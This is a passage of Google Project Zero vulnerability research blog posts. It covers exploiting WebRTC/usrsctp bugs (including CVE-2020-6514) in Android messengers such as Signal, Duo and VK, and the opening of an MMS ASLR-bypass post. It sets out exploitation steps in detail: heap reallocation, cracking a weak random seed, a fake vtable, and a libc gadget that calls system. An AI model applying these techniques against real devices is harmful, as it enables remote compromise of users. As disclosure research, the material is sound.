So I decided it would be better to allocate the memory replacing the m_buf structure in usrsctp. SCTP allows packets containing any number of chunks to be sent to a host, and in most cases they are processed as if they were a sequence of packets. Even better, the outbound packet queue that the freed m_buf structure is added to does not send any packets until all chunks in the current packet have been processed. This means that it should be possible to send a packet that contains a chunk that triggers the bug, and then a chunk that sets the freed memory to the needed values before it is sent back to the attacker. Since no network traffic needs to occur between when the m_buf structure is freed and when its memory is safely reallocated, this avoids the problem with OpenSSL.

Unfortunately, there are very few calls to malloc in usrsctp with sizes that are controllable by incoming traffic, and none of them allow the entire packet contents to be specified. The best I could find was in the processing of a data stream reset chunk. The code is as follows, with some parts removed for clarity.

if (asoc->str_reset_seq_in == seq) {
len = ntohs(req->ph.param_length);
number_entries = ((len - sizeof(struct
sctp_stream_reset_out_request)) / sizeof(uint16_t));
tsn = ntohl(req->send_reset_at_tsn);
asoc->last_reset_action[1] = asoc->last_reset_action[0];
if (...) {
...
} else if (SCTP_TSN_GE(asoc->cumulative_tsn, tsn)) {
/* we can do it now */
...
} else {
/*
* we must queue it up and thus wait for the TSN's
* to arrive that are at or before tsn
*/
struct sctp_stream_reset_list *liste;
int siz;
siz = sizeof(struct sctp_stream_reset_list) +
(number_entries * sizeof(uint16_t));
SCTP_MALLOC(liste, struct sctp_stream_reset_list *, siz, SCTP_M_STRESET);
if (liste == NULL) {
/* gak out of memory */
asoc->last_reset_action[0] =
SCTP_STREAM_RESET_RESULT_DENIED;
sctp_add_stream_reset_result(chk, seq,
asoc->last_reset_action[0]);
return;
}
liste->seq = seq;
liste->tsn = tsn;
liste->number_entries = number_entries;
memcpy(&liste->list_of_streams, req->list_of_streams,
number_entries * sizeof(uint16_t));
TAILQ_INSERT_TAIL(&asoc->resetHead, liste,
next_resp);

This code allocates the liste structure, which can be used to replace the freed mbuf structure. It has one really lucky feature, which is that the next_resp property, which lines up with the mh_next property of the mbuf structure happens to be of the correct type, also mbuf. This would cause problems if it were another type, as usrsctp iterates through the entire mbuf chain before sending a packet.

A less lucky feature is that the properties that line up with the mh_data property of mbuf structure happen to be the current reset sequence number, and the transmission sequence number (TSN). These both are subject to a number of checks in this method. The reset sequence number needs to be exactly equal to the sequence number set when the connection was initialized, either in an INIT or COOKIE_ECHO chunk, and also needs to be equal to the lower four bytes of the SctpTransport pointer. This check can be passed by sending a COOKIE_ECHO chunk that sets the reset sequence number to the needed value before triggering the bug.

More challenging is the check that is performed on the TSN. It is compared to the cumulative TSN, which is originally set to the same value as the reset sequence number. The actual comparison performed is a ‘sequence number greater than’, which determines whether one value is ahead of or behind another value, assuming sequence numbers that roll over to zero when all bits are set. For example, if the current sequence number is 0xFFFFFFFF, the value 2 would pass a  ‘sequence number greater than’ check, but the values 0xFFFFFFFE and 0x80000001 would fail. The TSN read out of the incoming packet has to be the top four bytes of the SctpTransport pointer, meanwhile the cumulative TSN has to be the bottom four bytes of this pointer because it is the same value as the reset sequence number. So this is actually a comparison between the two halves of the pointer. The TSN is a small number, less than 0x80 because it is the top of a pointer, so this comparison will return true roughly whenever bit 31 of the pointer is not set, and return the desired outcome of false roughly whenever it is set.

Bit 31 of the pointer is determined randomly by ASLR as well as where the SctpTransport instance is allocated on the heap, which means it is set about 50% of the time. Normally, I would be okay with an exploit being 50% effective, because that means it would probably succeed with a few tries, but in this case, that’s not true because it will have the tendency to fail again and again on the same ASLR layout. ASLR layout is determined when an Android device is started up, and doesn’t change again until it is rebooted. So I needed a way to change the cumulative TSN after the reset sequence number has been set.

It turns out that this is possible using the FWD_TSN chunk type, which allows a peer to request that another peer move its cumulative TSN up to 4096 bytes forward. It’s possible to move the cumulative TSN forward enough that bit 31 flips by sending this chunk type repeatedly.  This takes quite a few chunks, but combining chunks into fewer packets and sending them as fast as possible, it can be flipped in a few seconds.

Putting this all together, the bug can be used to make the target device send back the memory of the SctpTransport instance, which contains a pointer to the class’s vtable, finally giving the location of the WebRTC library and breaking ASLR.

Thinking about it a bit, I didn’t think the WebRTC library would be the best library to use for my exploit, as it’s not unusual for WebRTC integrators to statically link it with other libraries and use all sorts of toolchains. It would be easier to know the location of libc, which comes from the Android system and has less variation. So I added a second usage of this bug that reads the location of malloc from the global offset table, which is a fixed offset from the SctpTransport vtable that has already been read. This allows the location of libc to be calculated.

Moving the Instruction Pointer (Again)


In Part 1, I figured out how to use an RTP memory corruption bug to move the instruction pointer, but after I filed CVE-2020-6514, Jann Horn suggested that it might be possible to use this bug to move the instruction pointer as well. When WebRTC uses the SctpTransport pointer as an address, it doesn’t just use it to identify the connection, but it actually casts the pointer to class SctpTransport, and makes virtual calls on it when sending outbound packets received from usrsctp.

Meanwhile, usrsctp usually determines the address for outbound packets based on identifiers in the packet, but there is one situation where it extracts the address from the packet itself: when processing COOKIE_ECHO chunks. Normally, it wouldn’t be possible to put an untrusted pointer in this chunk type, as are usually echoed from an incoming packet and need to be signed. However, Jann noticed that the random number generation for the signing key is very weak. The following code gets called when usrsctp is initialized.

srandom(getpid()); 

The random number generator is then seeded by calling rand.

The INIT chunk sent when starting an SCTP connection contains a randomly generated key used for authentication, generated by the same random number generator used for the secret key. I wrote a script that determines the value of the remote PID based on this key, by calling srand on every number between 0 and 70 000, and seeing which one causes the random number generator to produce the same authentication key. It is then possible to infer the value of the secret key.

This key now allows the attacking device to send COOKIE_ECHO chunks with any contents, including changing the address to a custom pointer. This allows the instruction pointer to be moved, as a virtual call will be made on whatever address is provided the next time an outbound packet is sent, which happens immediately when the peer responds with a COOKIE_ACK. In the above section, I also discussed using COOKIE_ECHO packets to change the reset sequence number, while glossing over how I was actually sending them. It was using this same method.

I now had two possible methods for setting the instruction pointer in the exploit. I chose to move forward with this one, as it uses usrsctp, which is also necessary to break ASLR, meanwhile the RTP one uses a different feature. I felt that reducing the number of features needing to be enabled for this exploit to work would increase the number of applications it worked on, as sometimes applications disable specific WebRTC features.

Putting it All Together


Having all the necessary capabilities for an exploit, I then needed to put them all together. My general strategy was to make a fake object on the heap at a known location, and then make a virtual call on that object. The fake object would have a fake vtable in the same buffer that would point to system, which would run a shell command.

One missing piece is how to populate heap memory at a known location. One possibility was to use RTP to allocate memory of the same size as the SctpTransport object, hoping it gets allocated at the address directly after the object, or at a predictable location. I tried this, and it worked maybe 50% of the time, but considering I had a way to read memory, I thought I could do better.

I noticed that the SctpTransport class contains a CopyOnWriteBuffer object named partial_incoming_message_ that is sometimes used to store incoming SCTP data. SCTP supports data fragmentation, and usrsctp passes incomplete fragmented packets to WebRTC if they get above a certain size. These are stored in the partial_incoming_message_ object until the rest of the packet is received. So I thought if I sent the data for the fake object over SCTP to the target device, it would eventually populate this buffer, and I could read the address. (Note that this actually requires two reads, as there are two levels of indirection between a CopyOnWriteBuffer object and its backing data.)

I tried this, and it worked, but there was another problem. In order to create a fake object with a fake vtable, the fake object needed to reference itself, but this method only allowed me to know the location of the memory after it had been written to and couldn’t be changed. I looked a bit closer at how this functionality works. The code for setting the buffer is as follows.

transport->partial_incoming_message_.AppendData(
          reinterpret_cast<uint8_t*>(data), length);
          ...
if (!(flags & MSG_EOR) && (transport->partial_incoming_message_.size() < kSctpSendBufferSize)) {
        return 1;
      }
...
transport->invoker_.AsyncInvoke<void>(
RTC_FROM_HERE, transport->network_thread_,
rtc::Bind(&SctpTransport::OnInboundPacketFromSctpToTransport,
transport, transport->partial_incoming_message_, params,
flags));
transport->partial_incoming_message_.Clear();

What’s happening here is that incoming data is always immediately appended to the partial_incoming_message_ buffer, and then if it is an incomplete fragment, the function returns. Otherwise, it queues a thread to process the data, and then clears the buffer.

I started to wonder how clearing works, considering the data is still needed by the queued thread that might not be finished yet. It turns out that the  CopyOnWriteBuffer class retains references to the data, and only deletes it if there are zero references left. Otherwise, it decrements the reference count and allocated new data of the current size for the buffer. This means it is possible to read the location of the _incoming_message_ buffer before data is written to it, because it is actually allocated during the clear. So long as the data written by AppendData is shorter or the same size as the largest size ever cleared, this memory will not be reallocated.

This allowed me to create a heap buffer at a known location and populate it. The last step was to figure out what to populate it with. I started out by filling it up with sequential numbers, and then using the address it crashed on to figure out what memory to change. After using the crash locations to create the fake vtable, I ended up with a crash on a branch to X8, and the only other controllable register was X21. X0 was of course set to the location of the fake vtable, as this crash was due to a virtual call, as were X1 and X23.

Astoundingly, libc had the perfect gadget for this situation.

do_nftw(char const*,int (*) …) + 0x138

LDR             X0, [X23,#0x30]
LDR             X1, [X23,#0x70]
BLR             X21

Setting the value loaded in X23 to system, and copying a string parameter at an offset of 0x30 past the fake vtable caused system to be called with the parameter!

To give a quick overview, here are the steps required for the exploit, in order:

  1. The PID is determined based on the key in the INIT chunk, and then the secret key is determined
  2. The vtable is read from the SctpTransport object
  3. The location of malloc is read from the global offset table
  4. The partial_incoming_message_ buffer is populated with data of the needed size
  5. The partial_incoming_message_ buffer is cleared, so a new buffer is allocated
  6. The address of the partial_incoming_message_ buffer is read from the SctpTransport object
  7. The address of the partial_incoming_message_ backing buffer is read from the buffer structure
  8. The partial_incoming_message_ buffer is populated with exploit data, based on the location of of malloc
  9. The bug is triggered, making a virtual call to a gadget and then system

Now I had an exploit that worked in … the WebRTC sample Android application. Stay tuned for Part 3, where I explore what real Android applications the exploit works on.

✇Google Project Zero

Exploiting Android Messengers with WebRTC: Part 3

By: Tim

Posted by Natalie Silvanovich, Project Zero


This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. CVE-2020-6514 discussed in the blog post was fixed on July 14 with these CLs.This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. 

Part 3: Which Messengers?

In Part 2, I described an exploit for WebRTC on Android. In this section, I explore which applications it works on.

The exploit

When writing the exploit, I originally altered the SCTP packets sent to the target device by altering the source of WebRTC and recompiling it. This wasn’t practical for attacking closed source applications, so I eventually switched to using Frida to hook the binary of the attacking device instead. Frida’s hooking functionality allows for code to be executed before and after a specific native function is called, which allowed my exploit to alter outgoing SCTP packets as well as inspect incoming ones. Functionally, it is equivalent to altering the source of the attacking client, but instead of the alterations being made in the source at compile time, they are made dynamically by Frida at run time. The source for the exploit is available here.

There are seven functions that the attacking device needs to hook, as follows.

usrsctp_conninput // receives incoming SCTP
DtlsTransport::SendPacket // sends outgoing SCTP
cricket::SctpTransport::SctpTransport // detects when SCTP transport is ready
calculate_crc32c // calculates checksum for SCTP packets
sctp_hmac // performs HMAC to guess secret key
sctp_hmac_m // signs SCTP packet
SrtpTransport::ProtectRtp // suppresses RTP to reduce heap noise

These functions can be hooked as symbols, or as offsets in the binary.

There are also three address offsets from the binary of the target device that are needed for the exploit to work.  The offset between the system function and the malloc function, as well as the offset between the gadget described in the previous post and the malloc function are two of these. These offsets are in libc, which is an Android system library, so they need to be determined based on the target device’s version of Android. The offset from the location of the cricket::SctpTransport vtable to the location of malloc in the global offset table is also needed. This must be determined from the binary that contains WebRTC in the application being attacked.

Note that the exploit scripts provided have a serious limitation: every time memory is read, it only works if bit 31 of the pointer is set. The reasons for this are explained in Part 2. The exploit script has an example of how to fix this and read any pointer using FWD_TSN chunks, but this is not implemented for every read. For testing purposes, I reset the device until the WebRTC library was mapped in a favorable location.

Android Applications

A list of popular Android applications that integrate WebRTC was determined by searching APK files on Google Play for a specific string in usrsctp. Roughly 200 applications with more than five million users appeared to use WebRTC. I evaluated these applications to determine whether they could plausibly be affected by the vulnerabilities in the exploit, and what the impact would be.

It turned out the ways applications use WebRTC are quite varied, but can be separated into four main categories.

  • Projection: the screen and controls of a mobile application is projected into a desktop browser with user consent for enhanced usability
  • Streaming: audio and video content is sent from one user to many users. Usually there is an intermediary server, so the sender does not need to manage possibly thousands of peers, and the content is recorded for later viewing
  • Browsers: all major browsers contain WebRTC to implement the JavaScript WebRTC API
  • Conferencing: two or more users communicate via audio or video in real time

The impact of the vulnerabilities used in the exploit is different for each of these categories. Projection is low risk, as a lot of user interaction is required to set up the WebRTC connection, and the user has access to both sides of the connection in the first place, so there is little to gain by compromising the other side. 

Streaming is also fairly low risk. While it’s possible that some applications use peer-to-peer connections when a stream has a low number of viewers, they usually use an intermediary server that terminates the WebRTC connection from the sending peer, and starts new connections with the receiving peers. This means that the attacker usually cannot send malformed packets directly to a peer. Even with a set-up where streaming is performed peer-to-peer, user interaction is required for the target to view the stream, and there’s often no way to limit who can access a stream. For this reason, streaming applications that use WebRTC are probably not useful for targeted attacks. Of course, it is possible that these vulnerabilities affect the servers used by streaming services, but this was not investigated in this research.

Browsers are almost certainly vulnerable to most bugs in WebRTC, because they allow a large amount of control over how it is configured. To exploit such a bug in a browser, an attacker would need to set up a host that acts like the other peer in the peer-to-peer connection, and convince the target to visit a webpage that starts a call to that host. In this case, the vulnerability would have a similar impact to other memory corruption vulnerabilities in JavaScript.

Conferencing is the highest risk usage of WebRTC, but the actual impact of a vulnerability depends on a lot of how users of an application contact each other. The highest risk design is an application where any user can contact any other user based on an identifier. Some applications require the callee to have interacted in a specific way with the caller before a call can be made, which makes users harder to contact a target and generally reduces risk. Some applications require users to enter a code or visit a link to start a call, which has a similar effect. There is also a large group of applications where it is difficult or impossible to call a specific user, for example chat roulette applications, and applications which have features that allow a user to start a call to customer support. 

For this research, I focused on conferencing applications that allow users to contact specific other users. This reduced my list of 200 applications to 14 applications, as follows.

Name
Installs on Play Store
1B
1B
1B
500M
100M
OK and TamTam (similar apps by same vendor)
100M/10M
100M
50M
10M
10M
10M
10M

This list was compiled on June 18, 2020. Note that a few applications were removed because their server was not operational on that day, or they were very difficult to test (for example, required watching multiple ads to make a single call).

One application tested will not be identified in this blog post, as a serious additional vulnerability was discovered in the process of testing that has not yet been fixed or reached its disclosure deadline. This blog post will be updated when the disclosure deadline has passed. Update (2020-10-14): The affected application was Mocha. We discovered this vulnerability.

Testing the Exploit

The following section describes my attempts to test the exploit against the above applications. Please note that due to the number of applications, limited time was spent on each, so there is no guarantee that every attack against WebRTC was considered. While I am very confident that applications found to be exploitable are indeed exploitable, I am less confident about applications found to be not exploitable. If you need to know whether a specific application is vulnerable for the purposes of protecting users, please contact the vendor instead of relying on this post.

Signal

I started off by testing Signal because it is the only open-source application on this list. Signal integrates WebRTC as a part of a library called ringrtc. I built ringrtc and then Signal with symbols, and then hooked the needed symbols with the Frida script on the attacker device. I tried the exploit and it worked about 90% of the time!




This attack did not require any user interaction with the target device because Signal starts the WebRTC connection before an incoming call is answered, and this connection can accept incoming RTP and SCTP. The exploit is not 100% reliable on Signal and other targets because Bug 376 requires that a freed heap allocation is replaced with the next allocation of the same size performed by the thread, and occasionally another thread will do an allocation of the same size in the meantime. Failure results in a crash that is usually not evident to the user because the process respawns, but a missed call will appear.

This exploit was performed on Signal 4.53.6 which was released on January 13, 2020, as Bug 376 had already been patched in Signal by the time I finished the exploit. CVE-2020-6514 was also fixed in later versions, and ASCONF has also been disabled in usrsctp, so the code that caused Bug 376 is no longer reachable. Signal has also recently implemented a feature that requires user interaction for the WebRTC connection to be started when the caller is not in the callee’s contacts. Signal has also stopped using SCTP in their beta version, and plans to add this change to the release client once it is tested. The source for this exploit is available here.

Google Duo


Duo was also an interesting target, as it is preinstalled on so many Android devices. It dynamically links the Android WebRTC library, libjingle_peerconnection_so.so with no obvious modifications. I reverse engineered this library in IDA to find the location of all the functions that needed to be hooked, and then modified the Frida script to hook them based on their offsets from an exported symbol. I also modified the offset between the cricket::SctpTransport vtable and the global offset table, as it was different than in Signal. The exploit also worked on Duo. Source for the Duo exploit is available here.



This vulnerability did not require any user interaction, as like Signal, Duo starts the WebRTC connection before a call is answered.

The exploit was tested on version 68.0.284888502.DR68_RC09 which was released on December 15, 2019. The vulnerability has since been fixed. Also, at the time this application was released, it was possible for Duo to call any Android device with Google Play Services installed, regardless of whether Duo had been installed. This is no longer the case. A user now needs to set up Duo and have the caller in their contacts for an incoming call to be received.

Google Hangouts


While Google Hangouts uses WebRTC, it does not use data channels, and does not exchange SDP in order to set up calls, so there is no obvious way to enable them from a peer. For that reason, the exploit does not work on Hangouts.

Facebook Messenger


Facebook Messenger is another interesting target. It has a large number of users, and according to its documentation, any user can call any other user based on their mobile number. Facebook Messenger integrates WebRTC into a library called librtcR11.so, which dynamically links to usrsctp from another library, libxplat_third-party_usrsctp_usrsctpAndroid.so. Facebook Messenger downloads these libraries dynamically as opposed to including them in the APK, so it is difficult to identify the version I examined, but it was downloaded on June 22, 2020. 

The librtcR11.so library appears to use a version of WebRTC that is roughly six years old, so it was before the class cricket::SctpTransport existed. That said, the analogous class cricket::DataMediaChannel appeared to be vulnerable to CVE-2020-6514. The libxplat_third-party_usrsctp_usrsctpAndroid.so library appears to be more modern, but contains the vulnerable code for Bug 376. That said, it does not appear to be possible to reach this code from Facebook Messenger, as it is set to use RTP data channels as opposed to SCTP data channels, and does not accept attempts to change the channel type via Session Description Protocol (SDP). While it is not clear whether the motivation behind this design is security, this is a good example of how restricting attacker access to features can reduce an application’s vulnerability. Facebook also waits until a call is answered before starting the WebRTC connection, which further reduces the exploitability of any WebRTC vulnerabilities that affect it.

Interestingly, Facebook Messenger also contains a more modern version of WebRTC in a library called librtcR20.so, but it does not appear to be used by the application. It is possible to get Facebook Messenger to use the alternate library by setting a system property on Android, but I could not find a way an attacker could cause a device to switch libraries.

Viber


Like Facebook Messenger, while Viber version 13.3.0.5 appeared to contain the vulnerable code, but the application disables SCTP when the PeerConnectionFactory is created. This means an attacker cannot reach the vulnerable code.

VK


VK is a social networking app released by Mail.ru in which users have to explicitly allow specific other users to contact them before each user is allowed to call them. I tested my exploit against VK, and it required some modifications to work. To start, VK doesn’t use data channels as a part of its WebRTC connection, so I had to enable it. To do this, I wrote a Frida script that hooks nativeCreateOffer in Java, and makes a call to createDataChannel before the offer is created. This was sufficient to enable SCTP on both devices, as the target device determines whether to enable SCTP based on the SDP provided by the attacker. The version of WebRTC was also older than the one I wrote the exploit for. WebRTC doesn’t contain any version information, so it is difficult to tell for sure, but the library appeared to be at least one year old based on log entries. This meant that some of the offsets in the ‘fake object’ used by the exploit were different. With a few changes, I was able to exploit VK.

VK sends an SDP offer to a target device to start a call, but the target does not return the SDP answer until the user has accepted the call, which means this exploit requires the target to answer the call before the WebRTC connection is started. This means the exploit will not work unless the target manually answers the call. In the video below, the exploit takes a fair amount of time to run after the user has answered. This is due to how I designed the exploit, and not due to fundamental limitations of the vulnerabilities it uses. In particular, the exploit waits for usrsctp to generate specific packets even though they could be generated more quickly by the exploit script, and also uses delays to avoid packet reordering when responses could be checked instead. It is likely that with enough effort, this exploit could run in less than five seconds. Also note that I altered the exploit to work with a single incoming call, as opposed to two incoming calls in the exploits above, as it is not realistic to expect a target to answer a call twice in quick succession. This didn’t require substantial changes to how the exploit works, though it does make the exploit code more complex and difficult to debug.



Regardless, the requirement that a user must choose to accept calls from an attacker before they can call, alongside the requirement that the user answer the call and stay on the line for a few seconds makes this exploit substantially less useful against VK compared to applications without these features.

Testing was performed against VK 6.7 (5631). Like Facebook, VK dynamically downloads its version of WebRTC, so it is difficult to specify its version, however testing was performed on July 13, 2020. VK has since updated their servers so that a user cannot start a call with SDP that contains data channels, so the exploit no longer works. Note that VK does not use WebRTC for two-party calls, only group calls, so I tested this exploit using a group call. The source for the exploit is available here.

OK and TamTam


OK and Tamtam are similar messaging applications released by the same vendor, also Mail.ru. They use a dynamically downloaded version of WebRTC that is identical to the one used by VK. Since the library is exactly the same, my exploit also worked on OK, and I didn’t bother also testing TamTam because it is so similar.



Like VK, OK and TamTam do not return the SDP answer until the target has answered the call by interacting with the phone, so this is not a fully remote exploit on OK and TamTam. OK also requires users to choose to accept messages from another user before the user can call them. TamTam is a bit more liberal, for example, if a user verifies a phone number, any user who has their phone number can contact them.

Testing was performed on version 20.7.7 of OK on Monday, July 13. SDP-only testing was performed on TamTam version 2.14.0. Since then, the servers for these applications have been updated so that SDP containing data channels cannot be used to start a call, so the exploit no longer works.

Discord
Discord has documented its use of WebRTC thoroughly. The application uses an intermediary server for WebRTC connections, which means that it is not possible for a peer to send raw SCTP to another peer, which is required for the exploit to work. Discord also requires several clicks to enter a call. For these reasons, Discord is not affected by the vulnerabilities discussed in this post.

JioChat


JioChat  is a messaging application that allows for any user to call any other user based on phone number. Analyzing version 3.2.7.4.0211, it appeared that its WebRTC integration contained both vulnerabilities, and the app exchanges the SDP offer and answer before the callee accepts the incoming call, so I expected the exploit to work without user interaction. However, this was not the case when I tested it, and it turns out that JioChat uses a different strategy to prevent the WebRTC connection from starting until the callee has accepted the call. I was able to easily bypass this strategy, and get the exploit to work on JioChat.



Unfortunately, JioChat’s connection delay strategy introduced another vulnerability, which has been fixed, but the disclosure period has not expired for. For this reason, details of how to bypass it will not be shared in this blog post. The source for the exploit without this functionality is available here. JioChat has recently updated their servers so that SDP containing data channels cannot be used to start a call, meaning that the exploit no longer works on JioChat.

Slack and ICQ


Slack and ICQ are similar in that they both integrate WebRTC, but do not use the transport features of the library (note that Slack doesn’t integrate WebRTC directly for audio calls, it integrates Amazon Chime, which integrates WebRTC). They both use WebRTC for audio processing only, but implement their own transport layer and do not use WebRTC’s RTP and SCTP implementations. For this reason, they are not vulnerable to the bugs discussed in this blog post, and many other WebRTC bugs.

BOTIM


BOTIM has an unusual design that prevents the exploit from working. Instead of calling createOffer and exchanging SDP, each peer generates its own SDP based on a small amount of information from the peer. SCTP is not used by this application by default, and it was not possible to use SDP to turn it on. Therefore, it was not possible to use this exploit. BOTIM does appear to have a mode where it exchanges SDP with a peer, but I could not figure out how to enable it.

Other Application


The exploit worked in a fully remote fashion on one other application, but setting up the exploit revealed an obvious additional serious vulnerability in the application. Details of the exploit’s behavior on the application will be released after the disclosure period has expired for the vulnerability.

Discussion

The Risk of WebRTC

Out of the 14 applications analyzed, WebRTC enabled a fully remote exploit on four applications, and a one-click exploit on two more. This highlights the risk of including WebRTC in a mobile application. WebRTC does not pose a substantially different risk than other video conferencing solutions, but the decision to include video conferencing in an application introduces a large remote attack surface that wouldn’t be there otherwise. WebRTC is one of the few fully remote attack surfaces of a mobile application, and of Android in general. It is likely the highest risk component in almost every application that uses it for video conferencing.

Video conferencing is vital to the functionality of some applications, but in others it is an ‘extra’ that is rarely used. Low usage does not make video conferencing any less of a risk to users. It is important for software makers to consider whether video conferencing is a truly necessary part of their application, with a full understanding of the risk it presents to users.

WebRTC Patching

This research showed that many applications fall behind with regard to applying security updates to WebRTC. Bug 376 was fixed in September of 2019, yet only two of the 14 applications analyzed had patched it. There were several factors that led to this.

To start, usrsctp does not have a formal process for identifying and communicating vulnerabilities. Instead, bug 376 was fixed like any other bug, so the code was not pulled into WebRTC until March 10, 2020.  Even after it was patched, the bug was not noted on the Security Notes for the Chrome Stable channel, which is where WebRTC tells developers to look for security updates. This means that developers of applications that use an older version of WebRTC and cherry-pick fixes, or applications that include usrsctp separately from WebRTC would not be aware of the need to apply this patch.

This is not the full story though, as many applications include WebRTC as an unmodified library, and there have been other WebRTC vulnerabilities included in the Chrome Security Notes since March 2020. Another contributing factor is that until 2019, WebRTC did not provide any security patching guidance to integrators, in fact, their website inaccurately said that no vulnerabilities had ever been reported in the library, which occurred because WebRTC security bugs are generally filed in the Chromium bug tracker, and there was no process for considering these bug’s impact on non-browser integrators at the time. Many of the applications I analyzed had versions of WebRTC that predated this, so it is likely that the legacy of this incorrect guidance still causes applications to not update WebRTC. While WebRTC has done a lot to make it easier for integrators to patch WebRTC, for example allowing large integrators to apply for advance notice of vulnerabilities, there is still likely a long tail of integrators who have only seen the old guidance. Of course, there is no guarantee that integrators would have followed better guidance if it was available, but considering that for a long time it was very difficult for an integrator to know when and how to update WebRTC even if they wanted to, it is likely it would have had an impact.

Integrators also have a responsibility to keep WebRTC up to date with security fixes, and many of them have failed in this area. It was surprising to see so many versions of WebRTC that are well over a year old. Developers should monitor every library they integrate for security updates, and apply them promptly.

Application Design


Application design affects the risk posed by WebRTC, and many applications researched were designed well. The easiest, and most important way to limit the security impact of WebRTC is to avoid starting the WebRTC connection until the callee has accepted the call by interacting with the device. This turns an exploit that can compromise any user quickly into an exploit that requires user interaction, and won’t be successful on every target. It also makes lower quality vulnerabilities not practically exploitable, because while a fully remote exploit can be attempted many times without the user noticing, an exploit that requires a user to answer a call needs to work in a small number of tries.

Starting the WebRTC connection late has a performance impact, and precludes certain features, like giving the callee a preview of the call. Of the applications that the exploit worked on, two started the connection without user interaction, and two required user interaction. JioChat and the application we are not yet identifying tried to use unique tricks to delay the connection until the user accepted the call without performance impact, but introduced vulnerabilities as a result. Developers should be aware that the best way to delay a WebRTC connection is to avoid calling setRemoteDescription until the user has accepted the call.  Other methods might not actually delay the connection and can cause other security problems.

Another way to reduce the security risk of WebRTC is to limit who an attacker can call, for example by requiring that the callee have the user in their contact list, or only allowing calls between users that have agreed to be able to message each other in the application. Like delaying the connection, this greatly reduces the targets an attacker can reach without a lot of effort.

Finally, integrators should limit the features of WebRTC an attacker can use to the features the application needs. Many applications were not vulnerable to this specific exploit because they had effectively disabled SCTP. Others did not use SCTP, but did not disable it in a way that prevented attackers from using it, and I was able to enable it. The best way to disable a feature in WebRTC is to remove it at compile time, which is supported for certain codecs. It is also possible to disable certain features through the PeerConnection and PeerConnectionFactory, and this is also very effective. Features can also be disabled by filtering SDP, but it is important to make sure that the filter is robust and tested thoroughly.

Conclusion

I wrote an exploit for WebRTC for Android involving two vulnerabilities in usrsctp. This exploit was fully remote on Signal, Google Duo, JioChat and one other application, and required user interaction on VK, OK and TamTam. Seven other messengers were not affected because they effectively disabled SCTP. Several applications used versions of WebRTC that did not include patches for either of the vulnerabilities used in the exploit. One remains unpatched. Low patch uptake is partially a result of WebRTC historically providing poor patching guidance. Integrators can reduce the risk of WebRTC by requiring user interaction to start a WebRTC connection, limiting who users can call easily and disabling unused features. They should also consider whether video conferencing is an important and necessary feature of their application.

Vendor Response

The software vendors mentioned in this blog post were given a chance to review this post before it was posted publicly, and some provided responses, as follows.

WebRTC

The WebRTC bug that was used both to bypass ASLR and move the instruction pointer has been fixed. WebRTC no longer passes the SctpTransport pointer directly into usrsctp, using an opaque identifier that is mapped to a SctpTransport instead, with invalid values being ignored. We have identified and patched every affected Google product and reached out to 50 applications and integrators using WebRTC, including all applications analyzed in this post. For all applications and integrators who have not yet patched the vulnerability, we recommend updating to the WebRTC M85 branch, or patching the following two commits: 1, 2.

Mail.ru

User security is of the highest priority for all Mail.ru Group products, which include VK, OK, TamTam and others. Acting on the information we received regarding the vulnerability, we immediately started the process of updating our mobile apps to the latest version of WebRTC. This update is currently underway. We have also implemented algorithms on our servers that no longer allow this vulnerability to be exploited in our products. This action allowed us to fix the issue for all of our users within 3 hours of receiving the information with an exploit demonstration.

Signal

We appreciate the effort that went into finding these bugs and improving the security of the WebRTC ecosystem. Signal had already shipped a defensive patch that protected users from this exploit prior to its discovery. In addition to routine updates of our calling libraries, we continue to take proactive steps to mitigate the impact of future WebRTC bugs.

Slack

We're pleased to see that this report concludes that Slack is not impacted by the referenced WebRTC vulnerabilities and exploits. Upon learning about this risk, we undertook additional diligence and confirmed that the entirety of our Calls service is not impacted by the vulnerabilities and findings described here.
✇Google Project Zero

MMS Exploit Part 5: Defeating Android ASLR, Getting RCE

By: Ben
Posted by Mateusz Jurczyk, Project Zero

This post is the fifth and final of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. Previous posts are linked below:


Furthermore, with this last post, I have uploaded the source code of the MMS exploit to GitHub and the bug tracker. I hope it will serve as a useful reference while reading this blog, and help bootstrap further research in the area of MMS security.

Introduction

Up until this point in the story, I have managed to construct a reliable ASLR oracle delivered via MMS. It works by taking advantage of a buffer overflow to corrupt an android::Bitmap object on the heap and trigger a read from a controlled address, and abuses MMS delivery reports to transmit the oracle output (crash or lack thereof) back to the attacker. In fact, the oracle conveniently makes it possible to test the readability of an arbitrary memory range, not just a single address. On the other hand, due to the crash handling logic on Android, the queries must be sent at least one minute apart from each other, which severely limits the data throughput of the already restricted communication channel.

The current goal is to take the 1-bit information disclosure, and use it to build a high level algorithm capable of remotely leaking full 64-bit addresses in an acceptable number of steps. The acceptability criteria is hard to clearly define, since in real life, it would mostly depend on the tolerable exploit run time specified by the malicious actor. The general rule of thumb is "the fewer, the better", but for the purpose of the exercise, I aimed to design an exploit running in a maximum of 8 × 60 = 480 oracle queries (and what follows, ~480 minutes). This corresponds to the average user's night sleep, and seemed like a plausible attack scenario for a zero-click MMS exploit.

There are two major aspects of defeating ASLR: what do we leak and how do we leak it. As disconnected as they might seem, the two elements are actually closely related. It might not matter which parts of the process address space we intend to use, if they don't overlap with what we can realistically find in memory. With that in mind, I decided to start by familiarizing myself with the typical address space of the com.samsung.android.messaging process, and the overall state of ASLR on Android 10. This would hopefully give me an understanding of some of its weaknesses (if any), and ideally some ideas for bypassing the mitigation. From the outset, the only thing I knew for a fact was the Zygote design, which guaranteed persistent addresses across different instances of a crashing app, and was a crucial part of the attack. I learned the rest mostly by experimenting with a rooted Galaxy Note 10+ phone, as outlined in the sections below.

Android memory layout

Throughout this blog post, we'll be analyzing the Messages memory map found in the /proc/pid/maps pseudo-file. When we look at a few different maps (obtained by rebooting the phone several times to re-randomize the memory layout), we can immediately notice that a majority of mappings, including all shared objects, reside somewhere between 0x6f00000000 and 0x8000000000, with a few exceptions:

  • Mappings of .art, .oat and .vdex files under /system/framework, and some Dalvik-related regions in the low 4 GB of the address space.
  • An isolated mapping of the /system/bin/app_process64 ELF somewhere between 0x5500000000 and 0x6500000000.

